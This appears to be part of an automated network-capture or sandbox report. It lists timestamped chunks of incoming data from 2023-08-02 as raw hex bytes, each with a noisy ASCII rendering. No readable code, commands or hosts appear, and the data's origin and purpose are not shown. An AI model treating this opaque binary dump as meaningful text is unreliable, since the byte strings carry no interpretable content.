                                                          2023-08-02 08:16:22 UTC2575INData Raw: b6 73 89 78 62 34 95 50 56 c6 51 56 1e 68 98 74 c0 1e 3a 40 a0 f8 0a 5a 7d db fa 79 ab 60 fb f1 c1 9e f6 ef 9b 00 ea 1b af 34 3c 65 fa f9 31 96 68 50 82 9c 23 41 3d 54 54 2b 9b 10 0c 6a be 98 71 4c 0f 44 d0 fd 20 86 28 ce 61 34 8b 1c b0 ba b2 e4 b9 09 27 68 43 55 90 3a c4 db 63 25 6b 93 2b 68 db d1 a2 36 16 8d 09 63 34 1c b2 21 30 e7 67 20 d8 a1 ff 0c ce de fe 4a 84 57 4c 0d 02 aa bb f1 51 e6 88 e9 5f 3f 27 04 b7 12 3f 37 49 2f 11 c4 2f 11 ad f5 cc 77 42 ed b9 11 43 db 64 00 3e 18 08 b5 6d 5f 1f 4f 71 cf 8b 12 00 8f 7c e4 48 3b 47 e4 07 3a 22 fb 0c 42 4e 9f 04 94 2c c7 85 b2 79 0c 5b 5c dd f8 63 cf 09 e4 e6 cf 96 97 c4 04 72 35 45 da d3 d0 31 ae 11 25 64 24 9e c6 02 c5 ec 82 6e 33 c0 71 ca f8 27 56 59 cd a4 2c 6d 32 1e 97 b2 74 ca 94 09 8e a3 4f 69 be 34
                                                          Data Ascii: sxb4PVQVht:@Z}y`4<e1hP#A=TT+jqLD (a4'hCU:c%k+h6c4!0g JWLQ_?'?7I//wBCd>m_Oq|H;G:"BN,y[\cr5E1%d$n3q'VY,m2tOi4
                                                          2023-08-02 08:16:22 UTC2591INData Raw: 92 4b 79 56 d8 50 91 85 58 3e ba b5 b1 90 4f af 1c 9a 99 fc 4b 07 ce bc 62 4a 6f c2 71 2e 2b ca c0 86 7c 9b 30 a8 2e 7a bd 2c 03 7e 27 9f a0 ca f4 4d 77 21 87 03 80 1a d2 24 76 b3 6c de f4 cb ec 17 a3 a3 7f 89 57 ae 58 f3 a8 a2 cc 2f ee de 64 50 41 05 96 40 f2 aa de 57 c2 62 07 d0 60 0e b3 3f ee 3f 96 7e f0 7f 9a 95 cb 58 d9 28 6b 17 1a 31 f0 27 f0 15 d3 70 fa e3 e0 39 e4 8e 69 c9 1d e7 49 45 4e 46 f6 8d a3 74 90 b2 23 d4 f0 16 b2 10 f1 13 f4 4a b2 1f 5e cd a3 f9 80 f6 ee 64 b6 f9 c0 33 f8 10 b8 a6 71 6a 37 9d 30 eb 37 f8 39 80 d1 cb 5a a2 4e 44 4f 12 28 8b cf 50 8d 6d b7 f8 85 57 1f c0 3a d3 99 a4 92 65 e3 c1 aa 9a f5 bb 9d 89 32 8d 19 ce 0a 07 55 4c 83 4c 98 c4 28 43 32 f9 28 6d ef 13 e8 b6 2d 99 3f c8 78 e8 79 45 36 10 bb fd 04 50 bb 4f 60 55 57 19 aa
                                                          Data Ascii: KyVPX>OKbJoq.+|0.z,~'Mw!$vlWX/dPA@Wb`??~X(k1'p9iIENFt#J^d3qj7079ZNDO(PmW:e2ULL(C2(m-?xyE6PO`UW
                                                          2023-08-02 08:16:22 UTC2607INData Raw: 96 8c 94 04 67 df ed cd 94 15 08 74 26 ab b7 fa 5a 0c c6 e5 f4 53 37 d0 7e b3 49 c4 13 59 be 26 7b 66 c8 5e 60 02 d8 eb c0 c3 f4 dd 65 76 e1 d7 46 43 2b 13 f9 8b 22 f2 24 f7 9c f6 04 95 34 05 0d 7f d2 5e 04 73 48 54 9c 87 5f 17 16 c1 20 fd 49 08 98 ac 78 08 b1 bd 6e 0f 0a 17 89 ea 58 77 1b 04 a8 8c 2a 17 68 ab f5 64 1a e3 d9 cd bb d3 ae 77 05 11 b8 2d 96 04 42 bb 1d 5e 5a 36 fd a7 b3 d5 1e 47 85 33 c6 b5 3d 0a 7f 37 4e d8 24 b8 83 2a 5a 4d 54 69 24 11 ff f3 1e 4c a0 67 db 58 66 dd df 91 b4 b1 1a 3c c7 9b 77 74 ae ed cd 73 91 65 00 b6 72 25 e9 15 f2 c1 a6 05 ef 66 58 75 37 c4 28 24 a0 b6 3f 92 54 c6 6a f5 e9 15 64 bd f1 99 72 e4 1b 5a 51 4b 85 53 f8 c2 51 06 20 94 a0 7b 20 e1 22 34 b2 db 8a 88 d3 31 99 30 98 49 43 6f 56 38 79 d6 4a 98 73 f6 71 32 f1 fd b2
                                                          Data Ascii: gt&ZS7~IY&{f^`evFC+"$4^sHT_ IxnXw*hdw-B^Z6G3=7N$*ZMTi$LgXf<wtser%fXu7($?TjdrZQKSQ { "410ICoV8yJsq2
                                                          2023-08-02 08:16:22 UTC2623INData Raw: 97 3a 93 62 a0 d0 05 5c c0 9a 78 ac 21 3c 1a e0 16 2b ee 8f f8 5c 2c 58 c6 21 b8 78 52 b7 dc 9b d8 a0 03 ac 2c df 4a 47 b6 73 dd 2d d6 c7 d7 ec 4b b7 ce fa ec ea 36 29 8f 40 e1 f8 d9 2b 1b 1e d3 33 c2 53 0e 3c 03 68 17 d3 b7 71 72 42 5e 21 4c 09 fb 4d c8 40 0f 22 ba 8a d6 99 b4 5e f7 21 5a 89 2b e6 10 2b fb a9 c0 c9 6e b7 48 91 1e 7a 92 89 4e 41 bd da 64 54 b1 1a 89 76 0b 6d cf ab 09 57 30 3a 4e 80 94 b2 c7 7f 8e aa 7d 85 ff cf 2f a5 81 cc b6 e8 36 2c db 33 6a 8b df f4 a8 d3 26 af bf a8 15 4e 12 0f 83 04 e1 30 99 b4 73 b6 3e fc 90 5a 3e c2 2e 9e 50 6d 94 97 18 cd e3 81 27 2f 24 ae 72 65 b9 19 4e 47 c2 d2 c9 f5 6b 64 eb b9 bb 86 7f f8 a5 a6 f5 36 78 c6 2a 81 fc 14 2e ca 2d c2 3e 06 99 a5 76 03 97 54 89 b7 be c4 e9 92 56 d1 f3 53 a2 3a df 31 eb dc 20 59 41
                                                          Data Ascii: :b\x!<+\,X!xR,JGs-K6)@+3S<hqrB^!LM@"^!Z++nHzNAdTvmW0:N}/6,3j&N0s>Z>.Pm'/$reNGkd6x*.->vTVS:1 YA
                                                          2023-08-02 08:16:22 UTC2639INData Raw: 68 8c a8 f8 14 10 34 92 48 e0 d3 cf 11 a2 e1 dc fd 51 01 40 2c c0 d2 3f 52 d2 ea c6 c3 33 45 23 a1 b5 70 16 88 8a e0 28 e9 df de 0f 7a b3 c1 6d 97 2c d9 9b 73 46 8a 6d 5b e3 8a 10 5e 81 a0 cc ae 18 7e 58 b1 64 1f 31 68 d0 53 d0 5b f2 25 16 ef d6 52 e2 f0 d2 39 e2 d2 fe 28 4c 9c 0d 8d 52 62 b3 e1 c6 b0 1d b7 da 47 12 34 d1 40 03 f3 2e bd bb 28 6d 85 c5 ac ee 06 06 26 96 e5 ac 98 d2 23 e1 69 8c b4 e5 e3 01 da d8 70 15 ed 94 65 6f fc 52 0f 3f e2 c5 af c4 fc 65 92 3e a7 5e 9f b6 f5 59 69 24 f7 47 25 df 67 f6 f8 23 11 81 a8 28 34 65 df 4f b2 6b 08 ce 71 46 07 b8 d5 c4 93 48 54 58 2a 89 53 e7 15 8b 02 b6 15 0b 29 95 f9 72 64 7d 8f bb 4d 41 52 4e 6a 04 26 61 2a 87 60 b0 7c 8b 5b 8a de e7 6a b7 02 34 a3 89 9e c6 cf e5 82 6d 13 d5 be 90 dd 0d 33 76 83 51 b4 0c b0
                                                          Data Ascii: h4HQ@,?R3E#p(zm,sFm[^~Xd1hS[%R9(LRbG4@.(m&#ipeoR?e>^Yi$G%g#(4eOkqFHTX*S)rd}MARNj&a*`|[j4m3vQ
                                                          2023-08-02 08:16:22 UTC2655INData Raw: f5 86 32 cd cd ba a3 d8 29 48 da 17 01 7d 65 2a 93 79 2d 92 98 0d 0f 7a b4 f2 b1 4f cd 43 77 36 e1 bf 17 86 91 53 a7 f8 39 9a 40 78 7b 8a 33 67 08 f2 46 bb 10 1f 83 8b 34 dc 50 11 62 eb bf 9d 37 94 55 1b ec 83 c2 27 a4 f1 4a 2e 02 e4 8e 5d 1a 2a 50 1a de 01 d3 7e d2 b1 51 5e 3c c7 10 7d 9c ab 23 2b 86 c2 28 59 c0 99 5f b9 5a e1 11 43 5a df 73 ee d7 01 78 46 8e 38 87 85 57 b3 38 79 a8 57 c3 20 9a ff 6f ee a2 c5 d0 70 68 02 2d a2 44 54 29 c1 f0 13 ac 49 2a b0 68 bd cc ab 4e 18 35 25 42 3f 99 27 03 6a 28 93 a9 dd 08 0a be 6f f5 cc 79 98 a9 98 66 78 c6 60 b3 b6 65 ed fb 88 bd 00 15 7e 2b ba a5 4d 48 38 41 c9 2a 78 22 3b c1 2f 34 aa ef 9d 5e 51 98 fe 4c ad ce 88 2b bf bf 10 12 3e b7 55 ce 4c 9a 4b 74 94 7d c0 a7 85 76 ec 18 7f ec 5b 3d d6 fc 2a 2f 61 9f 33 b1
                                                          Data Ascii: 2)H}e*y-zOCw6S9@x{3gF4Pb7U'J.]*P~Q^<}#+(Y_ZCZsxF8W8yW oph-DT)I*hN5%B?'j(oyfx`e~+MH8A*x";/4^QL+>ULKt}v[=*/a3
                                                          2023-08-02 08:16:22 UTC2671INData Raw: d9 33 d8 8e 7d 8e 1b 4c 5e 75 de 55 8c 64 aa 49 15 53 21 d7 eb b8 8b 23 ef e8 45 46 4d 9f d8 0f 52 fe be 5a 15 eb bd 62 49 3b de 45 61 26 f9 67 52 76 f5 7a 78 58 b1 cd 22 ad 61 59 b6 51 8b 46 ee 0c ef cc 15 ed ac b2 1d a4 20 85 91 32 8c 6d cc b7 63 73 34 a3 a3 c1 e3 bd 2f 33 d4 22 15 2f b2 b9 1a 16 8e 1a 90 9a 12 d3 87 4d ac dd d8 85 44 78 45 75 59 40 ca dc 6d e4 88 cd 79 8d 6f 48 06 b0 88 69 38 99 b1 c8 81 da c9 4f 9c 59 8a df 8f 2a e7 0b 60 4f 72 c8 a6 93 68 0b 6e 01 a0 b3 bb 6c 7d 4e 17 b3 6f 9b 55 34 9b a0 3c 92 50 f5 78 fe bd a0 3d b7 b0 f0 9c fe a8 11 24 03 d2 c3 80 9e 9a 0d c5 06 40 c6 0b 5b c0 60 c5 4e 3b a7 98 f7 6e 3f ca 27 81 8f fc 82 5c 89 64 ff c0 81 8c 12 7c 7a 93 7e 68 04 49 1f 29 e3 9e dc c6 98 80 70 a0 c6 b0 ed 20 e4 9c a8 1b b0 3f 04 dc
                                                          Data Ascii: 3}L^uUdIS!#EFMRZbI;Ea&gRvzxX"aYQF 2mcs4/3"/MDxEuY@myoHi8OY*`Orhnl}NoU4<Px=$@[`N;n?'\d|z~hI)p ?
                                                          2023-08-02 08:16:22 UTC2687INData Raw: 50 54 d5 39 eb e3 b2 b6 1d 95 f5 af da dc 19 25 ad aa b1 63 2d c0 7a 26 ab 3e f3 7c 7d 4e 3b 48 27 ee 26 04 ae 7b da 24 37 f4 fb ff 10 f7 f4 0f 62 9e 1f 97 6f 4a bd ed 44 f6 30 6d c2 c7 70 74 65 68 d6 df 21 52 df 58 ac 02 4f d7 94 fb ec 74 5b 9f ab 27 46 87 18 10 7e ce be de 7b a4 c5 0c d6 19 ee f7 00 25 ac d0 74 f1 06 2d 00 08 73 af c0 14 0c 65 f2 a4 3c c0 a5 db 10 f5 29 85 8b 24 f6 af c9 ca 6f cb 98 bd 99 4f 5c cd 3d 8a 60 01 6a d2 ef a5 7e 38 b2 52 56 5e 53 ff c8 b8 e3 75 fb cf 52 66 ee d3 ad 7d 95 49 a3 8e 4e 3e b1 4a 7e fe ad 7b 4b 8d 78 a1 13 4c e9 cf 12 3f 65 16 2b 54 41 a1 58 cf 2f 68 55 9c c6 96 4b be bf 60 10 5a bf ed 98 f2 34 eb 00 c6 72 f5 06 24 da f9 ea 81 5c 02 6d 0b a7 d6 35 3b f2 24 5a bf 8d 0c a0 d9 d3 36 07 09 26 66 9f bc 56 5f 00 7b a2
                                                          Data Ascii: PT9%c-z&>|}N;H'&{$7boJD0mpteh!RXOt['F~{%t-se<)$oO\=`j~8RV^SuRf}IN>J~{KxL?e+TAX/hUK`Z4r$\m5;$Z6&fV_{
                                                          2023-08-02 08:16:22 UTC2703INData Raw: 5f a4 2c 38 42 12 4d 13 a4 7d 1a 88 10 23 1b 13 c9 72 a5 93 a8 f5 f8 65 b2 f0 07 31 83 ba fa a5 60 73 94 fe 27 63 7a 78 ad 98 ea 0e 4c 14 1e 84 8c bf 90 de 1e 3c 50 5c 8b 71 cf 11 b0 47 a1 f8 5d 06 04 f8 fe bd 95 cd 00 86 1e 33 7a 7c 22 c3 26 20 38 2a be e7 e3 59 33 78 1c 8c b4 46 fc 08 e8 c2 ad e6 f6 2a ae 9c b2 65 ed 73 9b c5 3d 0e ba 09 18 8f 47 f0 ae eb a4 84 e9 88 69 e6 db bb f0 f7 93 55 43 b9 dc 0a 95 47 0f d5 d2 ca f8 60 67 ff 4d 97 0c ac 87 bf ee 43 79 37 50 7d 7b 60 13 7f be 9a f5 0e 96 48 f0 79 f8 07 de dd 74 e9 40 5b 6c 47 0f 5a 66 c3 e9 d0 02 a9 d6 5a 18 cf 95 ac 44 1d ed b9 16 a3 2e 54 56 e5 89 36 a3 c6 a9 9b 42 be 1b 17 ed 9d c3 80 21 3b 45 65 f4 9a 2a 02 03 00 b3 ff e4 24 de c8 e6 c8 49 72 77 0a 16 24 bb 90 ac dd 75 65 9d 1e a2 15 7d 9f 01
                                                          Data Ascii: _,8BM}#re1`s'czxL<P\qG]3z|"& 8*Y3xF*es=GiUCG`gMCy7P}{`Hyt@[lGZfZD.TV6B!;Ee*$Irw$ue}
                                                          2023-08-02 08:16:22 UTC2719INData Raw: 57 0e 14 43 3f 14 eb db 00 b6 54 cf 1b 55 b7 c5 86 a7 d7 3d 39 9b a7 0e 48 72 78 82 82 6b 46 9f 90 31 9c 80 2d 06 8b b9 de 54 bd ec bb 31 6b b4 5b 10 f5 f4 cf 9b 69 05 12 b4 26 df 87 4d 9f d8 1a 2b 69 da e3 13 70 e6 2f b9 d8 60 5b 66 b5 8a 8c 4d 44 e4 a3 af 16 06 bf ef 01 26 4b 70 66 76 a0 9b 01 b8 0e b8 af 17 7c f7 5f 92 f3 4a 5b 4a df 4f 09 f7 cf eb 1c f2 49 06 a7 51 a2 c4 e7 b1 9e b1 71 b9 47 b9 3e 53 18 21 10 40 15 c3 08 2a 7f 74 46 bb 1a f9 28 f6 ca c6 42 93 e6 47 fc 2f 64 a5 51 e0 b3 1d 25 ef 7d 9f e4 2b 87 1c 16 25 12 14 ba 58 d3 d4 e1 f2 96 4a 51 ff ee 62 05 02 26 04 7f 71 a4 64 ed b9 7f 8d 65 37 09 06 8f e7 71 32 a6 db c1 eb 3b a1 a6 4b de 15 97 c4 4a 21 90 49 8e dc c9 26 8e 6e b2 fb 6f f1 aa 17 be d9 4f ea d2 f6 fa 33 53 f9 e3 b8 c8 9f 87 c9 92
                                                          Data Ascii: WC?TU=9HrxkF1-T1k[i&M+ip/`[fMD&Kpfv|_J[JOIQqG>S!@*tF(BG/dQ%}+%XJQb&qde7q2;KJ!I&noO3S
                                                          2023-08-02 08:16:22 UTC2735INData Raw: e8 d7 a8 35 ae 34 e1 9c 90 3f 2d a0 51 b8 8a 80 42 c4 ce c7 45 cb 5c da 71 39 ae 81 86 64 35 b0 1c 70 95 f7 56 88 2c bd 74 f2 82 4f 05 eb 81 19 a0 96 74 1b bb 92 18 ef 6b 42 48 49 f9 39 03 0f 12 c4 8e 98 af 1d 1d 94 46 72 f5 03 e7 86 3a f0 15 70 d4 c9 5f 90 ac fa 22 35 8d 4a c8 3f e4 48 51 73 a6 f0 20 c2 76 2b 5c 9b 14 06 cc d6 89 c7 c7 0f b8 3e 24 29 0a b9 2e 2d e5 00 51 3c b7 ba fb 93 b7 85 c1 75 ef 93 ae bc 0d 0c b9 9b 91 0f e2 7b 64 08 33 9f bf 8e 97 d7 f7 14 1d a3 d2 c2 2f ad b0 97 e0 ff 14 3a 2c 60 09 a3 9b 5f aa 65 66 89 cb a4 b5 14 ae a4 e7 3c a5 d5 87 06 45 76 18 c1 df f9 ef 57 12 8a 1f cb f8 28 ed b4 05 32 d8 ab cc 87 79 e3 6d 82 ab eb e4 f7 6d 5a ea 63 23 6a c8 4e 18 14 78 69 82 c5 09 55 d1 36 61 9a 65 2a 54 60 3c 16 3a e3 ff d0 75 94 f0 61 c3
                                                          Data Ascii: 54?-QBE\q9d5pV,tOtkBHI9Fr:p_"5J?HQs v+\>$).-Q<u{d3/:,`_ef<EvW(2ymmZc#jNxiU6ae*T`<:ua
                                                          2023-08-02 08:16:22 UTC2751INData Raw: 88 cb 93 af 4b bd cd 50 04 c7 33 70 b8 9d 45 01 fc 34 8b 5b 6a 38 17 2e cf 35 3d e9 77 28 8a cc 39 fd 9f 94 fa 15 09 92 e7 33 85 ae bd 62 eb 7e e5 4a 54 9d 8d 37 eb 33 9c bf ec 92 5f 28 f4 fa ad bf b3 c3 53 6f 16 83 2f 0a 05 2e 90 31 5b e9 1f b4 1f 36 66 c1 38 fb 4c 3d f4 1d 32 b5 ce 02 31 14 e4 ec 95 07 3a 2c 2f d9 d3 9c 27 5f 9e 9f ec 08 d3 0b da fd 4f 8d 31 5a 26 fa 7f 30 ca 0f 70 9c f1 f8 5b ea e6 23 73 19 fe 99 67 b9 04 c8 de e3 80 fd 3b 69 d3 39 cf a8 7c 3e 3f 16 99 90 3a f2 77 5e 52 e3 83 4c ff 75 be 68 e0 4e 39 fa 76 71 86 82 b9 69 30 d5 6a 63 68 8e 63 5a 08 68 2d bc 61 b3 f3 86 47 c3 d2 57 be da d2 20 39 6b 18 30 1f 0f 22 a2 3d c5 2c 38 05 71 84 76 e7 69 14 f7 bb 5c 5e 1c f2 10 4d 9a 2e 4e df 71 00 75 f2 dd 9a d8 18 e6 99 d5 d7 be df 7b 22 02 ff
                                                          Data Ascii: KP3pE4[j8.5=w(93b~JT73_(So/.1[6f8L=21:,/'_O1Z&0p[#sg;i9|>?:w^RLuhN9vqi0jchcZh-aGW 9k0"=,8qvi\^M.Nqu{"
                                                          2023-08-02 08:16:22 UTC2767INData Raw: 64 02 bd 4b 1f 26 f3 00 53 15 f0 17 92 84 59 ee 80 95 1b 44 c4 9b 18 d7 ad 88 2f b5 23 86 d4 e6 4e da 55 ac f7 e9 00 e7 0a fc 53 f7 c6 0c c1 ca 6a 15 bd 0c 81 3d 54 91 e1 b7 9f ef 9b be 83 c4 94 d1 f5 75 62 6b a4 e9 d0 d8 01 5c ce 4c 87 41 a0 df e9 3e ed 61 b0 b2 37 cf 62 d1 db 21 db 25 18 69 c2 28 27 cb f3 69 07 6c a9 e4 19 c1 4e 0a a5 48 4c 51 fd 35 70 fa 31 fa 44 58 a2 30 a2 00 b7 fc cb dc 8f 71 81 bf a3 23 1e 9f 66 24 ec 0c 32 d3 97 61 6a d1 87 4c de e4 3d a5 f4 37 81 fe f5 fc ea 5e 87 f8 2a 61 0b fb f9 71 fc 56 fd 1e 6c 66 0e 96 62 c9 cb b5 93 96 c1 0c c1 9f 49 24 3d 12 49 65 25 0f 03 06 1c a3 78 f9 73 d5 c1 10 09 58 68 a9 3d 89 07 d4 ba 78 77 44 54 ae 01 cc e5 fc 4f 92 49 9b 4a 79 e0 6f 8a 5a d1 db a5 05 82 dc 29 9d b1 e1 26 52 ab 3d a6 dd 16 ef 77
                                                          Data Ascii: dK&SYD/#NUSj=Tubk\LA>a7b!%i('ilNHLQ5p1DX0q#f$2ajL=7^*aqVlfbI$=Ie%xsXh=xwDTOIJyoZ)&R=w
                                                          2023-08-02 08:16:22 UTC2783INData Raw: 5a 4d f7 21 ed 14 79 b4 f5 7d 6f b6 8b ed 30 bc a1 d2 94 91 98 86 d9 45 0c 8e cb 6c fe d0 28 6f de fa 99 09 94 0d 79 f4 5a 42 d7 6f 01 37 39 63 29 54 c6 fc 96 6c a0 be ae cc 44 cf d6 d1 ba d7 e8 80 60 ff 73 78 6a b1 44 09 51 2e 47 9b b6 8d cd 19 9d aa 2c 33 3b b8 81 e0 76 5d 74 5f 56 64 ca 50 c9 1f e0 18 4b 2f ff 20 c0 7c f7 25 a4 48 f1 ce 64 ba 81 4b a2 10 9f e1 30 be b7 22 e8 b9 05 a1 e5 03 08 ef 42 5f c0 79 1d f0 57 37 fd de 51 60 bd b9 13 a1 f6 4c 53 ac 08 e0 a0 97 11 c3 c4 3f 5e 63 bb ef bc f5 df 4c e1 fb 30 e6 90 be f6 9f 7f 71 23 2c 28 70 13 c9 30 47 fd a4 d6 b3 98 15 7d f6 1d 2a 7f ca 41 e4 36 67 0f 89 b4 e4 ff 91 7e 63 d4 40 28 fa 0b 6a 57 20 8b 91 bc 2d 7b ee 25 3e 82 08 cc c4 3b 0b 87 81 5e 11 04 59 6d 9e e2 8c ac 4b fb 26 f8 17 f7 bd e9 a0 0d
                                                          Data Ascii: ZM!y}o0El(oyZBo79c)TlD`sxjDQ.G,3;v]t_VdPK/ |%HdK0"B_yW7Q`LS?^cL0q#,(p0G}*A6g~c@(jW -{%>;^YmK&
                                                          2023-08-02 08:16:22 UTC2799INData Raw: 0f 31 bc d5 3a ac be de 14 f2 c0 23 3f 2c b4 a6 1b 81 73 58 bc 3f 37 90 4c 75 00 99 12 47 db e2 7e b8 63 d7 b6 21 ee 86 e5 df 18 ab b4 f1 8b 4d 0f c9 8c 47 d3 89 f6 cb 04 ff ee df 23 76 33 d6 16 66 88 f2 ed 29 bd ca 2b 61 4b c8 36 2e c9 37 18 b5 f9 8b ba d8 c1 bd 12 f0 3c 1f 22 df 89 56 b5 f6 b5 ad 02 ad 94 35 b1 89 f8 8c bf 11 7f e8 d6 5d d7 1f 86 4f 24 ec 77 a7 f2 de 50 19 77 ce ee e0 c6 76 11 23 f3 fa ca 88 30 36 92 e7 61 7a f3 5b 91 44 f0 5a 67 45 22 86 7b 4c bf 30 47 27 bf a3 db 48 23 61 bc 2c 34 83 75 e6 5c fe 64 37 39 3e 3e 72 a5 f0 76 da 8a c4 16 62 f6 de 5f f4 e7 c9 95 e1 d0 b7 38 69 74 ed 0d e5 ef 39 35 48 ba b0 81 cc d2 c1 87 f3 2d 9f ba 43 15 ea 7f 18 6f ac 3b 47 9d 2e 31 4a 32 98 2c a5 70 de ce c2 6c a3 8a 30 f7 80 08 73 74 22 c6 e0 61 de 45
                                                          Data Ascii: 1:#?,sX?7LuG~c!MG#v3f)+aK6.7<"V5]O$wPwv#06az[DZgE"{L0G'H#a,4u\d79>>rvb_8it95H-Co;G.1J2,pl0st"aE
                                                          2023-08-02 08:16:22 UTC2815INData Raw: 40 df 00 6e 9e 7d 08 4b d0 d8 f2 ae d3 e3 15 48 c8 3b 53 89 d9 da 02 70 54 3e a3 a2 c0 e7 9b 54 a3 74 60 44 66 cc 79 a6 8b 90 ca bf ff 30 28 e0 13 2e 3f 2e 9b 53 5b b1 f1 8c e7 4c 3a 27 16 d3 cc b2 02 1a 31 00 df 35 74 e2 33 db 79 ad 86 64 78 e7 dc 47 ae 77 9d 50 fe df 81 54 ee c5 df 39 60 55 90 86 99 d0 c5 e8 39 6f a7 0d 49 7b e1 6a f2 00 b1 c1 37 69 13 56 37 81 a9 1d 38 24 87 d5 b1 44 bf 96 3d 56 f4 32 11 74 49 c8 af 3a bd 06 59 82 ef 2c fb 7d 6f de b9 17 9a c9 be 15 91 fc 14 2e b1 64 7d 9b 81 6a 8f 0c e7 50 d8 d3 b0 27 bd ee b3 78 3c 69 19 24 4b aa 16 e2 1c c5 d0 19 00 de 21 9d 62 d9 05 89 9a 7c bf 81 4b 64 1e 01 7b 85 e2 dc 39 92 ee 3b e9 7d 78 e5 e2 c2 40 bd fe ff df c4 76 bc 13 66 09 a4 fd 35 d2 9b 2e b8 4b cf 9f 2c cd 3c fa 53 90 b5 29 23 77 18 45
                                                          Data Ascii: @n}KH;SpT>Tt`Dfy0(.?.S[L:'15t3ydxGwPT9`U9oI{j7iV78$D=V2tI:Y,}o.d}jP'x<i$K!b|Kd{9;}x@vf5.K,<S)#wE
                                                          2023-08-02 08:16:22 UTC2831INData Raw: e9 06 e7 98 76 da f4 7d 8b 44 9b 1c 37 10 08 24 c6 63 29 58 f7 c5 91 ed ee 71 cd b6 85 fb a8 3b 9c fd c5 37 c4 52 dd 18 4e 71 87 a2 6a 0e 55 39 2f dc e2 e0 33 35 0c 62 c5 f9 40 c5 c9 3c 9d dc 91 d3 af b5 6c ca 71 db b7 a8 c4 13 17 b8 ef e3 86 de 8f 0f 59 1e 36 d2 e9 8f 62 ac f2 74 e3 65 27 02 f7 f0 54 ce cd 11 b5 95 e2 28 e8 e5 cb f4 5e 42 77 af bc bb a7 fc 41 6d 84 bc 10 9d b3 9b 53 51 3f c8 d3 94 3f 57 fa 58 8c 45 82 88 08 74 1f 81 82 c3 a2 f0 d7 4c 71 40 7b 7f fa 41 61 fc ac 01 75 94 4b 25 91 d7 ee 8f c1 0b e0 c5 d7 c3 da c2 9e c9 8a fd 93 7c 22 ea 28 11 b1 9a 80 88 18 f1 44 a2 f2 ad 71 10 10 04 00 05 00 33 53 36 33 00 00 5f 64 e8 d9 67 69 05 9d 3c b0 b7 89 2d ea b8 22 69 10 16 10 4a 02 5b 78 00 5d 20 e0 2c 77 e9 97 0e 25 60 cb b8 f2 cc e0 ef ce fa f7
                                                          Data Ascii: v}D7$c)Xq;7RNqjU9/35b@<lqY6bte'T(^BwAmSQ??WXEtLq@{AauK%|"(Dq3S63_dgi<-"iJ[x] ,w%`
                                                          2023-08-02 08:16:22 UTC2847INData Raw: be a2 53 61 80 91 02 65 61 06 78 29 c1 b2 e6 de 84 f8 6f 75 c9 b4 35 28 83 6a a5 72 49 a7 c5 b8 bb 29 24 76 d4 31 74 fc b3 ae 55 aa 87 da 42 f5 c3 03 ed 6e 89 ba e2 26 ce bb b1 b1 4c 2b 68 35 ac df 85 05 21 7f 2a ce 6a e6 c8 63 f8 5a c1 15 ce 0a a6 6c 46 6d 00 27 81 78 0a c1 70 29 63 61 b0 4a 19 18 6c 76 46 2b fe 2f 5d 85 68 b8 84 ed 12 07 77 27 ab 15 9e 12 ae 21 c6 a2 c2 95 60 bb 06 49 b2 3f da 42 50 dc b5 56 f7 18 27 1f 55 c6 bd 09 21 74 b1 a1 4b 40 c2 2d 80 92 11 75 12 28 df f4 5a 5b 8a 97 91 57 69 ce a1 9c ee 8f 93 10 6b e3 56 47 31 97 a4 ac ac cd 03 fa cd 06 21 b5 b0 12 24 e0 2f 9e 00 15 e5 d0 14 66 30 28 c7 e0 8d 25 52 c4 32 2b ed d7 80 f2 27 12 27 29 fd ff 6c 90 24 39 22 2c 56 8f 2b 75 e6 c0 2e ce 4a 36 0b 0b c1 45 a6 75 62 59 ed 19 4a ea 94 0b 10
                                                          Data Ascii: Saeax)ou5(jrI)$v1tUBn&L+h5!*jcZlFm'xp)caJlvF+/]hw'!`I?BPV'U!tK@-u(Z[WikVG1!$/f0(%R2+'')l$9",V+u.J6EubYJ
                                                          2023-08-02 08:16:22 UTC2863INData Raw: f2 09 64 a1 40 05 18 1d 1c 03 b6 b0 4d c0 e3 b7 6d 0f ef 2f 93 55 00 42 92 a8 85 83 24 01 60 14 b8 56 82 61 00 44 80 92 02 61 7e 14 75 3a 04 c5 09 98 25 88 45 50 bf 17 0f 40 70 56 78 08 c7 20 25 10 40 29 00 b0 8c 91 2b 28 9c 6a 28 92 0d c9 4c 35 28 c9 8b b0 50 24 a8 57 a0 a0 29 72 71 c8 a2 e5 a2 1f 0a 42 71 52 55 83 41 52 0c 05 28 62 44 c2 35 45 13 52 e9 72 41 48 3b 3c 19 4e 27 45 48 4a 2a 75 8d 28 0c ec 3c be c0 ac e3 2c 78 eb 20 02 6d d6 d3 a5 0f f4 25 d1 74 15 09 52 2b a4 05 86 e0 2e 9a 12 ac d7 7a db ac 89 df 05 c9 42 09 04 c2 12 b0 87 a2 f4 1d c3 02 18 20 21 0a 54 a8 28 80 bd 50 89 f5 38 0c c8 30 42 1a c6 55 c0 06 8c 15 c4 05 31 ec 83 19 f1 8e 03 7d 04 d6 0b 29 a4 49 69 45 21 50 1a a7 b7 2c 7a 52 10 36 19 16 98 e4 b4 df 74 5e 87 11 67 00 6b f3 85 5e
                                                          Data Ascii: d@Mm/UB$`VaDa~u:%EP@pVx %@)+(j(L5(P$W)rqBqRUAR(bD5ERrAH;<N'EHJ*u(<,x m%tR+.zB !T(P80BU1})IiE!P,zR6t^gk^
                                                          2023-08-02 08:16:22 UTC2879INData Raw: 2a e1 87 f2 d0 ca af 92 2a 29 2a f4 09 81 e6 53 4f df c0 f0 00 00 8c 0c 59 cd 19 40 bd 9b 9e ef 9b 73 db 9c 6d 5d cb da 09 09 e8 af 34 12 8e f5 06 7f 34 81 93 48 4d 42 9a a6 3c 4e a3 30 1e 69 fe 98 df ff 03 f9 09 f4 04 23 78 8a 09 b5 2c 81 12 12 2c 07 97 03 96 b6 14 2c cc c5 2d 24 d3 28 21 c1 19 48 00 25 b6 bd 88 fe e2 f6 7e 8a 82 82 6f 5b da ac 29 96 03 63 40 6f 45 50 01 a4 08 20 c2 31 31 21 90 62 45 38 11 90 13 66 28 c5 7b 91 d8 3b 90 83 51 a0 84 d1 82 90 0a 8b 0a 90 4c 02 09 49 16 53 9b 57 98 b5 9f e6 b5 59 51 18 02 e9 03 24 a5 6d 12 93 51 0a 30 48 60 a9 12 92 5b 04 64 69 fa 41 93 67 51 06 c8 49 43 24 81 c4 12 28 01 a0 d5 27 2d 33 7a cb 22 a3 f9 7f a3 28 0a 88 7a 6f 1e 95 3a b5 c9 96 26 40 a6 96 14 b7 81 5a 52 80 03 40 36 8e ed 25 21 07 58 29 0a 61 a7
